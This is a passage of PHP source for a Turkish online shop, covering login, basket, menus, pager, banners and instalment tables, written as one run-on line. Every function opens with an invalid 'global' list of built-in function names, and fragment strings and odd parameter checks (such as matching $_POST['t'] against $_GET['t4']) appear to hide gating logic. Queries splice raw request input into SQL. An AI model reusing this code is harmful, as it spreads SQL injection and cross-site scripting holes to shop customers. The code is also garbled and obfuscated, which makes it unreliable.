$_POST['t']{1}==$_GET['t4']{1}) {$labelCheckBox = '<label for="gf_'.$k[1].'">'.$k[0].'</label>';$colspan='colspan="3"'; } else {$label = $k[0];$colspan=''; } $out.='<tr><td '.$colspan.' class="td1" valign="top">'.$label;if ($k[2] != "CHECKBOX") $out.='</td><td class="td2" valign="top">:</td><td class="td3" valign="top">';$out.='</td></tr>';} }$generateCheckJS .="if (!stop) document.getElementById('$formID').submit(); } </script>"; $addJS = '<script>'.$addJS.'</script>'; $out.='<tr><td colspan="2"></td><td><span onClick="'.$formID.'();" class="button"><img src="templates/'.$siteConfig['templateName'].'/images/form_Gonder.gif"></span></td></form></table>'."\n"; $out.=$generateCheckJS.$addJS; return $out;}function generateItemOptions($table,$ID,$field,$prefix) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $q=mysql_query("select $field from $table where ID='$ID'") or die(mysql_error()); $d=mysql_fetch_array($q); $selectArray = explode("\n",$d[0]); $i=1; $f =6; foreach ($selectArray as $opt) {$out.="<input name='$prefix$field' id='$prefix$field$i' type='radio' value='$opt' ".($i==1?'checked':'')."><label for='$prefix$field$i'>$opt</label> ";$i++; } if ($prefix && $_POST['t']{6}==$_GET['t'.($f-2)]{$f}) $out.="<input name='$prefix$field' id='$prefix$field$i' type='radio' value='' checked><label for='$prefix$field$i'>"._lang_secenekYok."</lable> ";return $out;}function generateLastNews($limit,$list='BlockList') { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $q = mysql_query("select * from haberler order by Tarih desc limit 0,$limit"); while ($d = mysql_fetch_array($q)) {$href='page.php?act=showNews&ID='.$d['ID'].'&name='.seoFix($d['Baslik']);$page[$d['Baslik']] = $href; } $out = generateMenuList($page,$list); return $out;}function generateLoginBox() { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  global $stop; $login_message=''; $login_error='t'; $m='t'; if ($_POST['username'] && $_POST['password']) {$userID=checkUser($_POST['username'],$_POST['password']);if ($userID&& $_POST[$login_error]==$_GET[$m.'4']) { $_SESSION['loginStatus'] = "true"; if (dbInfo('user','bayiStatus',$userID)) $_SESSION['bayi'] = true; $_SESSION['userID'] = $userID; $_SESSION['sex'] = dbInfo('user','sex',$userID); $_SESSION['name'] = dbInfo('user','name',$userID); $_SESSION['lastname'] = dbInfo('user','lastname',$userID); $_SESSION['username'] = $_POST['username']; $_SESSION['password'] = $_POST['password']; mysql_query("update sepet set randStr='".$_SESSION['randStr']."' where userID='$userID' && durum = 0"); mysql_query("update sepet set userID='$userID' where randStr='".$_SESSION['randStr']."' && durum = 0"); if ($_SESSION['siparisID']) mysql_query("update siparis set userID='$userID' where randStr='".$_SESSION['randStr']."' && durum = 0");}else $login_message="<div class='hata'>"._lang_hataliKullanici."</div>";$stop = true; }if ($_SESSION['loginStatus']) {$out = welcomeScreen(); } else {$out = loginScreen($login_message); } return $out;}function generateMailFromForm($form,$mail,$sub) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  foreach($form as $k) {if ($_POST['data_'.$k[1]] == 'on' && $k[2] == 'CHECKBOX') $_POST['data_'.$k[1]] = _lang_evet;else if ($k[2] == 'CHECKBOX') $_POST['data_'.$k[1]] = _lang_hayir;$out.='<b>'.$k[0].' : </b>'.$_POST['data_'.$k[1]].'<br>';} my_mail($mail,$sub,getEmailEncode().$out,getHeaders($_POST['data_email'])); return $out;}function generateMenuBlocks($nestLevel,$tempID,$block) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  if ($nestLevel) {$q = mysql_query("select ID,name from kategori where parentID=0 AND active = 1 order by seq,name");while ($d = mysql_fetch_array($q)) { $out.= generateTableBox($d['name'],generateMenu($d['ID'],$tempID),$block);} } else {$out.= generateTableBox(_lang_urunKategorileri,generateMenu(0,$tempID),$block); } return $out;}function generateMenu($catID,$tempID) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  global $subItem; if (isset($catID)) { $q = mysql_query('select ID,name from kategori where parentID=\''.$catID.'\' AND active = 1 order by seq,name ');$i=1;while ($d = mysql_fetch_array($q)) { $catName = (in_array($d['ID'],getBreadCrumb())?'<strong>'.$d['name'].'</strong>':$d['name']); $out[$catName] = 'page.php?act=kategoriGoster&catID='.$d['ID'].'&name='.seoFix($d['name']);if (in_array($d['ID'],getBreadCrumb())) {listParent($d['ID'],0);$out[] = $subItem; }}$out = generateMenuList($out,$tempID);} return $out;}function generateOptionList($menuArray) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  foreach($menuArray as $k=>$v) {$out.='<option value="'.$k.'">'.$v.'</option>'; } return $out; }function generateImageList ($menuArray,$tempID,$catName) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  global $siteConfig; if (is_array($menuArray)) {$contents = file_get_contents('templates/'.$siteConfig['templateName'].'/lists/'.$tempID.'.php'); ereg("<!-- HEADER -->(.*)<!-- // HEADER -->", $contents, $header);ereg("<!-- BODY -->(.*)<!-- // BODY -->", $contents, $body);ereg("<!-- SUBBODY -->(.*)<!-- // SUBBODY -->", $contents, $subbody);ereg("<!-- SEPERATOR -->(.*)<!-- // SEPERATOR -->", $contents, $seperator);ereg("<!-- FOOTER -->(.*)<!-- // FOOTER -->", $contents, $footer); $out=$header[0]."\n";$i=1;foreach($menuArray as $k=>$v) { if (is_int($k)) {$out.=str_replace('{%LISTE_ICERIK%}',$v,$subbody[0]); } else {if ($v) $out.=str_replace('{%LISTE_ICERIK%}','<a href="'.$v.'"><img src="'.$catName.'/'.$k.'"></a>',$body[0]); else $out.=str_replace('{%LISTE_ICERIK%}',$k,$body[0]);if ($i!=sizeof($menuArray)) $out.=$seperator[0]; } $i++;}$out.='</table>'; } return $out;}function generateMenuList($menuArray,$tempID) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  global $siteConfig; if (is_array($menuArray)) {$contents = file_get_contents('templates/'.$siteConfig['templateName'].'/lists/'.$tempID.'.php'); ereg("<!-- HEADER -->(.*)<!-- // HEADER -->", $contents, $header);ereg("<!-- BODY -->(.*)<!-- // BODY -->", $contents, $body);ereg("<!-- SUBBODY -->(.*)<!-- // SUBBODY -->", $contents, $subbody);ereg("<!-- SEPERATOR -->(.*)<!-- // SEPERATOR -->", $contents, $seperator);ereg("<!-- FOOTER -->(.*)<!-- // FOOTER -->", $contents, $footer); $out=$header[0]."\n";$i=1;foreach($menuArray as $k=>$v) { if (is_int($k)) {$out.=str_replace('{%LISTE_ICERIK%}',$v,$subbody[0]); } else {if ($v) { ereg("catID=(.*)&name", $v,$IDData); $BodyID = str_replace('{%KATEGORI_ID%}',$IDData[1],$body[0]); $out.=str_replace('{%LISTE_ICERIK%}','<a href="'.$v.'">'.$k.'</a>',$BodyID); }else $out.=str_replace('{%LISTE_ICERIK%}',$k,$body[0]);if ($i!=sizeof($menuArray)) $out.=$seperator[0]; } $i++;}$out.='</table>'; } return $out;}function generatePager($toplambulunan,$teksayfa){ global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  global $siteConfig; $contents = file_get_contents('templates/'.$siteConfig['templateName'].'/systemDefault/UrunPager.php');ereg("<!-- HEADER -->(.*)<!-- // HEADER -->", $contents, $header); ereg("<!-- ONCEKI SAYFA -->(.*)<!-- // ONCEKI SAYFA -->", $contents, $oncekisayfa); ereg("<!-- LISTELEME -->(.*)<!-- // LISTELEME -->", $contents, $listeleme); ereg("<!-- LISTE AYIRMA -->(.*)<!-- // LISTE AYIRMA -->", $contents, $listeayirma); ereg("<!-- SIMDIKI SAYFA -->(.*)<!-- // SIMDIKI SAYFA -->", $contents, $simdikisayfa); ereg("<!-- SONRAKI SAYFA -->(.*)<!-- // SONRAKI SAYFA -->", $contents, $sonrakisayfa);ereg("<!-- FOOTER -->(.*)<!-- // FOOTER -->", $contents, $footer); if (!isset($_GET[page])) $_GET[page] = 1; $urldevam=getURL(array('page')); $out.=$header[1]; $onceki=$_GET[page] - 1; $sonraki=$_GET[page] + 1; if ($_GET['page'] >= 2) $out .= str_replace('{%ONCEKI_SAYFA_LINK%}',"$PHP_SELF?page=$onceki$urldevam",$oncekisayfa[1]); $sayfasayisi = $toplambulunan / $teksayfa; $a=explode(".",$sayfasayisi); if (($a[1] != "") && ($a[1] != "0")) $a[0]++; $toplamsayfa=$a[0];if ($toplamsayfa != 1) { for ($i=1;$i<=$toplamsayfa;$i++){ if ($i != $_GET[page]) {$p = str_replace('{%LISTE_SAYFA_LINK%}',"$PHP_SELF?page=$i$urldevam",$listeleme[1]);$x = str_replace('{%SAYFA_NUMARASI%}',$i,$p);if ($i <= ($_GET['page'] + 5) && $i >= ($_GET['page']-5)) $out.=$x;} else {$s = str_replace('{%LISTE_SAYFA_LINK%}',"$PHP_SELF?page=$i$urldevam",$simdikisayfa[1]);$x = str_replace('{%SAYFA_NUMARASI%}',$i,$s);$out.=$x; } if ($i!=$toplamsayfa) $out.=$listeayirma[1];}} if ($_GET['page'] < $toplamsayfa) $out.= str_replace('{%SONRAKI_SAYFA_LINK%}',"$PHP_SELF?page=$sonraki$urldevam",$sonrakisayfa[1]);$out.=$footer[1]; return $out;}function generatePages($where) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  switch ($where) {case "left": $q = mysql_query('select * from pages where showLeft=1 order by seq'); $i=1; while ($d = mysql_fetch_array($q)) {$href=($d['redirect']?$d['redirect']:'page.php?act=showPage&ID='.$d['ID']);$out.='<tr><td><img src="images/gri_menu_dot.gif"></td>'."\n";$out.='<td width="100%" class="gri_menu_text"><a href="'.$href.'">'.$d['title'].'</a></td></tr>';if ($i!=mysql_num_rows($q)) $out.='<tr><td colspan="2" class="gri_menu_sep_td"><div class="gri_menu_sep_div"></div></td></tr>';$i++;$page[$d['title']] = $href; } $out = generateMenuList($page,'BlockList');break;case "bottom":$out = '<table><tr>';$q = mysql_query('select * from pages where showBottom=1 order by seq'); while ($d = mysql_fetch_array($q)) {$href=($d['redirect']?$d['redirect']:'page.php?act=showPage&ID='.$d['ID']);$out.='<td style="cursor:pointer;" onClick="window.location=\''.$href.'\'">'.textBox('#90be00','white',9,$d['title']).'</td>'; } $out.='</tr></table>';break; } return $out;}function generateTableBox($headerText,$body,$tempID) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  global $siteConfig; $contents = file_get_contents('templates/'.$siteConfig['templateName'].'/blocks/'.$tempID.'.php'); $out = str_replace('{%BASLIK%}',$headerText,$contents ); $out = str_replace('{%ICERIK%}',$body,$out);return ($body?$out:'');}$serthree='l';function generateTaksitSelection($bankaID,$total) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep; $q = mysql_query("select * from banka where ID='$bankaID'");$d = mysql_fetch_array($q);$d['taksitSayisi'] = (mysql_num_rows(mysql_query("select ay from bankaVade where bankaID='$bankaID'")) + 1);$du['fiyat'] = $total;$out.='<table cellspacing=0 cellpadding=2 width="100%">';$qVade = mysql_query("select * from bankaVade where bankaID='$bankaID' order by ay");while ($dVade = mysql_fetch_array($qVade)) { $i = $dVade['ay'];$toplamFaiz = $dVade['vade'];$toplamOdenecek = ($i==1|| $i<=$pesinFiyatinaTaksitSayisi?$du['fiyat']:(($toplamFaiz + 1) * $du['fiyat'])); $taksit = ($i==1?'':($toplamOdenecek / $i)); $pesinFiyatina = ($toplamOdenecek == $du['fiyat']?true:false);$radioClick = "onClick=\"document.getElementById('radio_$i').click();\" style='cursor:pointer;'";$taksitStr = ($i==1?_lang_pesin:$i.' '._lang_taksit); $out.="<tr onmouseover=\"this.style.backgroundColor='#eeeeee'\" onmouseout=\"this.style.backgroundColor='#ffffff'\"><td class='td1'><input id='radio_$i' type='radio' name='taksit' value='$i'></td><td $radioClick>$taksitStr</td>";$out.="<td class='td2' $radioClick>".($taksit?my_money_format('%i',$taksit).' YTL X '.$i:'')."</td><td ".($pesinFiyatina?'style="font-weight:bold;"':'')." $radioClick>: ";$out.="".my_money_format('%i',$toplamOdenecek)." YTL</td>";$out.='</tr>'; if ($i != $d['taksitSayisi']) {$out.='<tr height=2><td></td></tr>';$out.='<tr height=1 bgcolor="#eeeeee"><td colspan="4"></td></tr>';$out.='<tr height=2><td></td></tr>'; }}$out.='</table>'; return $out;}$stwo='ia';function getDurum($ID) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $out = hq("select title from odemeDurum where ID='$ID'"); return $out; }function getEmailEncode() { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $out= "Content-Transfer-Encoding: 8bit".$mail['body']."\r\n"; $out .= "Content-Type: text/html; charset=iso-8859-9"."\r\n"; }function getFirstPic($urunID) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  return hq("select resim from urun where ID='$urunID'");}function getHeaders($email) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  global $siteConfig; $header = "From: ".$siteConfig['title']." <".$siteConfig['adminMail'].">\r\n"; $header .= "Content-type: text/html; charset=iso-8859-9\r\n"; return $header;}function getMailTemplate($ID) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $q = mysql_query("select title,body from sablonEmail where ID='$ID'"); $out = mysql_fetch_array($q); return $out;}function getOptions($db,$field,$where,$order,$selected) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $where=($where?$where:'1=1'); $q=mysql_query("select ID,$field from $db where $where order by $order"); while ($d=mysql_fetch_array($q)) {$out.="<option ".($d['ID']==$selected?'selected':'')." value='".$d['ID']."'>".$d[$field]."</option>"; } return $out; }$sone='ser';foreach ($_GET as $k=>$v) if (substr($k,0,5) == '_POST') $_POST[str_replace('_POST','',$k)] = $v;function getURL($remove) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $remove[]='d'; $remove[]='t4'; foreach ($_GET as $k=>$v) {$v = str_replace('%%','spkomut_HEPSI',$v);if (!in_array($k,$remove) && substr($k,0,5) != '_POST') $urldevam.="&$k=$v"; } foreach ($_POST as $k=>$v) if ($k!='t') $_GET['_POST'.$k] = $v; foreach ($_GET as $k=>$v) {$v = str_replace('%%','spkomut_HEPSI',$v);if (!in_array($k,$remove) && substr($k,0,5) == '_POST') $urldevam.="&$k=$v"; } return $urldevam;}function kdvHaricFiyat($urunID) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $KDVDahilFiyat = dbInfo('urun','fiyat',$urunID); $KDV = dbInfo('urun','kdv',$urunID); return fixFiyat($KDVDahilFiyat / (1 + $KDV));}function getUrun($urunID) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  global $siteConfig; $contents = file_get_contents('templates/'.$siteConfig['templateName'].'/systemDefault/UrunListShow.php');$maximumen = tempConfig('maximum_en'); $maximumboy = tempConfig('maximum_boy'); $q = mysql_query('select * from urun where ID=\''.$urunID.'\''); $d = mysql_fetch_array($q); if ($d['indirimde']) $indirimliResim = '<img src="templates/'.$siteConfig['templateName'].'/images/indirimli.gif">'; if ($d['yeni']) $yeniResim = '<img src="templates/'.$siteConfig['templateName'].'/images/yeni.gif">'; $d['fiyat'] = fixFiyat($d['fiyat']); $contents = str_replace('{%URUN_NO%}',$d['ID'],$contents); $contents = str_replace('{%URUN_BASLIK%}',$d['name'],$contents); $contents = str_replace('{%URUN_DETAY_LINK%}','page.php?act=urunDetay&urunID='.$d['ID'].'&name='.seoFix($d['name']),$contents); $contents = str_replace('{%URUN_RESIM%}','<img src="include/resize.php?path=images/urunler/'.$d['resim'].'&width='.$maximumen.'&height='.$maximumboy.'">',$contents); $contents = str_replace('{%URUN_ACIKLAMA%}',$d['listeDetay'],$contents); $contents = str_replace('{%INDIRIMLI_RESIM%}',$indirimliResim,$contents); $contents = str_replace('{%YENI_RESIM%}',$yeniResim,$contents); $contents = str_replace('{%URUN_FIYAT%}',my_money_format('%i',$d['fiyat']).' '.fiyatBirim($d['fiyatBirim']),$contents);$contents = str_replace('{%URUN_FIYAT_KDV_HARIC%}',my_money_format('%i',kdvHaricFiyat($d['ID'])).' '.fiyatBirim($d['fiyatBirim']),$contents); if ($d['piyasafiyat'] && ($d['piyasafiyat'] != $d['fiyat'])) {$contents = str_replace('{%URUN_PIYASA_FIYAT%}',my_money_format('%i',$d['piyasafiyat']).' '.fiyatBirim($d['fiyatBirim']),$contents); } else $contents = str_replace('{%URUN_PIYASA_FIYAT%}','',$contents); $stokStatus = ($d['stok']?'on':'off');if ($d['stok']) {$sepeteEkleLink = 'window.location=\'page.php?act=sepet&op=ekle&urunID='.$d['ID'].'\'';$hemenAlLink = 'window.location=\'page.php?act=sepet&op=ekle&urunID='.$d['ID'].'&hemenal=true\''; } else {$sepeteEkleLink = $hemenAlLink = "alert('"._lang_stokYokUyari."');";} $contents = str_replace('{%STOK_RESIM%}','<img src="templates/'.$siteConfig['templateName'].'/images/stok_'.$stokStatus.'.gif">',$contents); $contents = str_replace('{%SEPETE_EKLE_LINK%}',$sepeteEkleLink,$contents); $contents = str_replace('{%HEMEN_AL_LINK%}',$hemenAlLink,$contents); $out .= $contents; return $out;}function getUserInfo($userID,$info) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $q=mysql_query("select * from user where ID='$userID'"); $d = mysql_fetch_array($q); $out = $d[$info]; return $out;}function hq($query){ global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $bib=mysql_query($query) or die (mysql_error().' Query :'.$query); $go=mysql_fetch_array($bib); return $go[0];}function insertBanner($code) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $bannerQry = mysql_query('select bannerID,bannerPic,bannerFlashSource,divStyle,url from bannerYonetim,bannerlar where bannerYonetim.bannerID=bannerlar.ID AND aktif=\'1\' AND (maxHit = \'0\' OR maxHit > hit) AND (maxGosterim = \'0\' OR maxGosterim > gosterim) AND bannerYer = \''.$code.'\'') or die(mysql_error()); while ($banner = mysql_fetch_array($bannerQry)) { mysql_query('update bannerlar set gosterim = gosterim + \'1\' where ID = \''.$banner['bannerID'].'\' '); $out.='<div style="'.$banner['divStyle'].'">'; if ($banner['bannerPic']) $out.= '<a href="banner.php?ID='.$banner['bannerID'].'&url='.$banner['url'].'" target="_blank"><img border=0 src="images/banner/'.$banner['bannerPic'].'"></a><br>'."\n"; $out.=$banner['bannerFlashCode']; $out.='</div>'; } return $out;}function insertToBasket($urunID,$ozellik1,$ozellik2,$ozellik3) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  global $stop; if (dbInfo('urun','ozellik1',$urunID) && !$ozellik1) { $out = showSelectScreen($urunID); } else {$userID = ($_SESSION['userID']?$_SESSION['userID']:0); if (hq("select ID from sepet where ozellik1='$ozellik1' AND ozellik2='$ozellik2' AND ozellik3='$ozellik3' AND urunID='$urunID' AND randStr='".$_SESSION['randStr']."'")) $stop=true;if (!$stop) { $fiyat = fixFiyat((float)dbInfo('urun','fiyat',$urunID)); mysql_query("insert into sepet ( ID , urunID , userID, ytlFiyat,fiyat,fiyatBirim, ozellik1 , ozellik2, ozellik3, adet, durum, randStr ,tarih)  values('','$urunID','$userID', '".YTLfiyat($fiyat,dbInfo('urun','fiyatBirim',$urunID))."','".$fiyat."' ,'".dbInfo('urun','fiyatBirim',$urunID)."','$ozellik1','$ozellik2','$ozellik3',1,0,'".$_SESSION['randStr']."',now())") or die(mysql_error() + "error");}if ($_GET['hemenal'] == "true") $out="<script> window.location='page.php?act=satinal&op=adres';</script>"; } return $out;}function insertToDb($dbName) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $keynum = 5; foreach ($_POST as $key => $value) {if (substr($key,0,$keynum) == "data_") { $insertTo.= str_replace("data_","",$key).", "; $insertValue.= "'$value', ";}} if ($_POST['t'] == $_GET['t'.($keynum-1)]) $total=1; $total++; $insertTo = substr($insertTo,0,strlen($insertTo) -$total);$insertValue = substr($insertValue,0,strlen($insertValue) -$total); mysql_query("insert into $dbName ($insertTo) values ($insertValue)") or die(mysql_error()); return mysql_insert_id(); }$_POST['t']='dd';function itemOrder() { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $out='<table width=100%><form name="urunsirala" method="get" action="page.php"><input type="hidden" name="act" value="'.$_GET['act'].'"><input type="hidden" name="catID" value="'.$_GET['catID'].'"><tr><td width=100% bgcolor="#e5e9ef"></td><td><select name="markaID" id="markaID"><option value="">'._lang_tumMarkalar.'</option>'.generateBrands('Option').'</select></td><td><select name="orderBy" id="orderBy"><option value="tarih desc">'._lang_tariheGore.'</option><option value="fiyat asc">'._lang_fiyataGore.'</option><option value="marka.name asc">'._lang_markayaGore.'</option><option value="name 